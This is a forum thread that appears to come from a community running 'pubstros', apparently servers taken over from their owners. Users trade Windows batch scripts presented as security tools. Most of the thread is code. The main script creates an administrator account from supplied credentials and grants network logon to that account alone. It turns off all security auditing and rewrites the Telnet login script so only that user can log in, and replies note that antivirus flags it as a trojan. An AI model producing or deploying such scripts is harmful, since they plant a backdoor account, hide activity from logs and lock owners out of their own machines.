With it you can protect your pubstros just execute it in remote
Avec ceci, vous pouvre proteger vos stros

Sorry if is already posted
Désolé si cela a deja été posté

its a Backdoor.Iroffer.1213

thats all that u are able to ...

no !!
isn't a backdoor!!!

my antiv. has it identify :

Backdoor.Iroffer.1213

thats all what i can say !

remove this file Moderator is backdoor

this is for nt

Hey twelve.

Firstly for Contributing! Thats what we like to see!
Secondly for keeping it bBilingual! Not excluding anyone is a good thing.

Lastly, guys, this isnt a backdoor. A lot of AV software goes a little over the top and will identify files as a viri or backdoors etc even though the files arent anything of the sort. Still, err on the side of caution!

Open it with notepad (or any text editor you have) and check out its contents. Its a very basic bat which will delete the different network shares. Its a half hearted attempt to secure a machine from being vulnerable via a null session. (afaik ) Here is the .bats content:

net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete G$ /y
net share /delete H$ /y
net share /delete I$ /y
net share /delete J$ /y
net share /delete K$ /y
net share /delete L$ /y
net share /delete M$ /y
net share /delete N$ /y
net share /delete O$ /y
net share /delete P$ /y
net share /delete Q$ /y
net share /delete R$ /y
net share /delete S$ /y
net share /delete T$ /y
net share /delete U$ /y
net share /delete V$ /y
net share /delete W$ /y
net share /delete X$ /y
net share /delete Y$ /y
net share /delete Z$ /y
net share /delete ADMIN$ /y
net share /delete IPC$ /y
net share /delete lwc$ /y
net share /delete print$ /y
net share /delete C$ /y
net share /delete ADMIN$
net share /delete IPC$

hihi thanks

thx

Bad methods to secure ur win machine i use this code:

@echo off
net share /delete C$ /y
net share /delete D$ /y
net share /delete E$ /y
net share /delete F$ /y
net share /delete G$ /y
net share /delete H$ /y
net share /delete I$ /y
net share /delete J$ /y
net share /delete K$ /y
net share /delete L$ /y
net share /delete M$ /y
net share /delete N$ /y
net share /delete O$ /y
net share /delete P$ /y
net share /delete Q$ /y
net share /delete R$ /y
net share /delete S$ /y
net share /delete T$ /y
net share /delete U$ /y
net share /delete V$ /y
net share /delete W$ /y
net share /delete X$ /y
net share /delete Y$ /y
net share /delete Z$ /y
net share /delete ADMIN$ /y
net share /delete IPC$ /y
net share /delete lwc$ /y
net share /delete print$ /y
net stop messenger
net stop netbios
net stop "Remote Registry Service"
net stop "Computer Browser"
net stop "REMOTE PROCEDURE CALL"
net stop "REMOTE PROCEDURE CALL SERVICE"
net stop "Remote Access Connection Manager"
net stop "telnet"
net share /delete C$ /y > net.deld
net share /delete ADMIN$ >> net.deld
net share /delete IPC$ >> net.deld

have fun

if it so ..

then sry @ twelve

tanks for the code

lol ......
it seems that everyone wants to get rid of the hidden shares in Win2K, WinXP et al but I would like to point out that using a batch program to disable the shares is a tedious task. I mean, everytime u restart windows u have to run the batch file because the hidden shares will be enabled on system restart. So why not get rid of these shares for good ... we can do it the "REG" way ....
Here is the key which creates shares on every boot, disable it u'll be able to sleep in peace.

:: Key to disable NULL Sessions
Key: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Value: restrictanonymous
Type: REG_DWORD
Data: 1

This is how I do it. I've got a batch file which disables all the un-necessary services. Its been uploaded in the 'System Hardening' section. You can have a look at it and make changes if required. I've commented it as well in case anyone needs to know what's happening
Thank you ....

LOL!
that isnt a backdoor!
Iroffer thats an XDCC bot! ;D

yes digger...
secure with help of reg is the best way
but he had postet a .bat which is not so good so
i thought to show them a better script

greetz KuerbY

LOL heres a secure bat


rem Blocks all netbios connections from all accounts except the one specified
rem secure.bat username password

@echo off
del temp
echo [Version] >> temp
echo signature="$CHICAGO$" >> temp
echo Revision=1 >> temp
echo [Profile Description] >> temp
echo Description=Default Security Settings. (Windows 2000 Professional) >> temp
echo [System Access] >> temp
echo MinimumPasswordAge = 0 >> temp
echo MaximumPasswordAge = 42 >> temp
echo MinimumPasswordLength = 0 >> temp
echo PasswordComplexity = 0 >> temp
echo PasswordHistorySize = 0 >> temp
echo LockoutBadCount = 0 >> temp
echo RequireLogonToChangePassword = 0 >> temp
echo ClearTextPassword = 0 >> temp
echo [Event Audit] >> temp
echo AuditSystemEvents = 0 >> temp
echo AuditLogonEvents = 0 >> temp
echo AuditObjectAccess = 0 >> temp
echo AuditPrivilegeUse = 0 >> temp
echo AuditPolicyChange = 0 >> temp
echo AuditAccountManage = 0 >> temp
echo AuditProcessTracking = 0 >> temp
echo AuditDSAccess = 0 >> temp
echo AuditAccountLogon = 0 >> temp
echo [Registry Values] >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\signsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\sealsecurechannel=4,1 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requirestrongkey=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\requiresignorseal=4,0 >> temp
echo machine\system\currentcontrolset\services\netlogon\parameters\disablepasswordchange=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enablesecuritysignature=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanworkstation\parameters\enableplaintextpassword=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\requiresecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enablesecuritysignature=4,0 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\enableforcedlogoff=4,1 >> temp
echo machine\system\currentcontrolset\services\lanmanserver\parameters\autodisconnect=4,15 >> temp
echo machine\system\currentcontrolset\control\session manager\protectionmode=4,1 >> temp
echo machine\system\currentcontrolset\control\session manager\memory management\clearpagefileatshutdown=4,0 >> temp
echo machine\system\currentcontrolset\control\print\providers\lanman print services\servers\addprinterdrivers=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\restrictanonymous=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\lmcompatibilitylevel=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\fullprivilegeauditing=3,0 >> temp
echo machine\system\currentcontrolset\control\lsa\crashonauditfail=4,0 >> temp
echo machine\system\currentcontrolset\control\lsa\auditbaseobjects=4,0 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\shutdownwithoutlogon=4,1 >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticetext=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\legalnoticecaption=1, >> temp
echo machine\software\microsoft\windows\currentversion\policies\system\dontdisplaylastusername=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\scremoveoption=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\passwordexpirywarning=4,14 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\cachedlogonscount=1,10 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatefloppies=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatedasd=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\winlogon\allocatecdroms=1,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\setcommand=4,0 >> temp
echo machine\software\microsoft\windows nt\currentversion\setup\recoveryconsole\securitylevel=4,0 >> temp
echo [Privilege Rights] >> temp
echo seassignprimarytokenprivilege = >> temp
echo seauditprivilege = >> temp
echo sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sebatchlogonright = >> temp
echo sechangenotifyprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-1-0 >> temp
echo secreatepagefileprivilege = *S-1-5-32-544 >> temp
echo secreatepermanentprivilege = >> temp
echo secreatetokenprivilege = >> temp
echo sedebugprivilege = *S-1-5-32-544 >> temp
echo sedenybatchlogonright = >> temp
echo sedenyinteractivelogonright = >> temp
echo sedenynetworklogonright = >> temp
echo sedenyservicelogonright = >> temp
echo seenabledelegationprivilege = >> temp
echo seincreasebasepriorityprivilege = *S-1-5-32-544 >> temp
echo seincreasequotaprivilege = *S-1-5-32-544 >> temp
echo seinteractivelogonright = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545,*S-1-5-21-1960408961-1637723038-1801674531-501 >> temp
echo seloaddriverprivilege = *S-1-5-32-544 >> temp
echo selockmemoryprivilege = >> temp
echo semachineaccountprivilege = >> temp
echo senetworklogonright = %1 >> temp
echo seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo seremoteshutdownprivilege = *S-1-5-32-544 >> temp
echo serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551 >> temp
echo sesecurityprivilege = *S-1-5-32-544 >> temp
echo seservicelogonright = >> temp
echo seshutdownprivilege = *S-1-5-32-544,*S-1-5-32-551,*S-1-5-32-547,*S-1-5-32-545 >> temp
echo sesyncagentprivilege = >> temp
echo sesystemenvironmentprivilege = *S-1-5-32-544 >> temp
echo sesystemprofileprivilege = *S-1-5-32-544 >> temp
echo sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547 >> temp
echo setakeownershipprivilege = *S-1-5-32-544 >> temp
echo setcbprivilege = >> temp
echo seundockprivilege = *S-1-5-32-544,*S-1-5-32-547,*S-1-5-32-545 >> temp

net user /add %1 %2
net localgroup administrators %1 /add
secedit.exe /configure /areas USER_RIGHTS /db C:\winnt\temp\temp.mdb /CFG temp

del %SystemRoot%\system32\login.cmd
echo @echo off >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem Default global login script for the Telnet Server >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd
echo rem In the default setup, this command script is executed when the >> %SystemRoot%\system32\login.cmd
echo rem initial command shell is invoked. It, in turn, will try to invoke >> %SystemRoot%\system32\login.cmd
echo rem the individual user's login script. >> %SystemRoot%\system32\login.cmd
echo rem >> %SystemRoot%\system32\login.cmd

echo if %%USERNAME%%==%1 goto good >> %SystemRoot%\system32\login.cmd
echo exit >> %SystemRoot%\system32\login.cmd
echo :good >> %SystemRoot%\system32\login.cmd

echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd
echo echo Welcome to Microsoft Telnet Server. >> %SystemRoot%\system32\login.cmd
echo echo *=============================================================== >> %SystemRoot%\system32\login.cmd

echo cd %%HOMEDRIVE%%%HOMEPATH%% /d >> %SystemRoot%\system32\login.cmd
del temp

del root.reg
echo REGEDIT4 >> root.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RemoteRegistry\] >> root.reg
echo "Start"=dword:00000003 >> root.reg
regedit /S root.reg
net stop RemoteRegistry
del root.reg

A really nice batch program. Nice piece of code, I really like batch.
Just one question, is it yours ? If not, then I suggest that u reference it please. And if its yours, then I need some classes
By the way, Norton sounded its alarms saying that its a trojan. So I assume that it was written quite some time back and was loose on the Internet.

You might want to update the restrictanonymous = 2.
Also this doesnt really work with XP anymore. Use restrictanonymoussam = 1

Thanx for posting the .bats guys.

I think that bats been modded for the last 2 years if I were to reference anyone it would be a person per letter alot of ppl have put in alot of work thats all I know and no way I'll take credit for it all

can anyone give me the bat file code to make that registry change to restrict anonymous for both winxp and the other?

Try searching the forum for 'restrict anonymous' and hopefully you'll find it. I posted the key sometime back

Oaaa! only English please

same post, page 1

digger i cant seem to find the topic where you discuss the key, can you remember what it is? im looking to put it in a .bat file

Ive whacked this together from the previous pages.

yeah mazer is right there iroffer is a dcc bot , but many av`s alert against harmfull (but for others ) programs ...ever scanned pqak its marked as virus too , because its a powerfull utility for bruteforcing net shares ...but wtf has a dcc bot doing in a batch i suggest ..take the code up there , save yoou`re own bat just so u can be sure u`re not catching a bot on u`re system...